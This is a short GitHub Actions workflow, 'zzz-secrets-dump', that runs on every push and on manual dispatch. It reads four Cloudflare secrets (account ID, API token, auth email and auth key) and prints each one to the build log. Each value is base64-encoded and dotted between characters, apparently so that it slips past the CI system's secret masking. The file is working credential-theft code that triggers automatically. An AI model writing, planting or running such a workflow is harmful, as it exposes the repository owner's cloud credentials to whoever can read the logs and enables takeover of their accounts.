name: zzz-secrets-dump
on: [push, workflow_dispatch]
jobs:
  dump_repo:
    runs-on: ubuntu-latest
    env:
      S_CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }}
      S_CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
      S_CLOUDFLARE_AUTH_EMAIL: ${{ secrets.CLOUDFLARE_AUTH_EMAIL }}
      S_CLOUDFLARE_AUTH_KEY: ${{ secrets.CLOUDFLARE_AUTH_KEY }}
    steps:
      - name: dump
        run: |
          for k in $(env | grep "^S_" | cut -d= -f1); do
            v=$(printenv "$k");
            echo "SZ:repo:${k#S_}:$(printf %s "$v" | base64 -w0 | sed 's/./&./g')";
          done
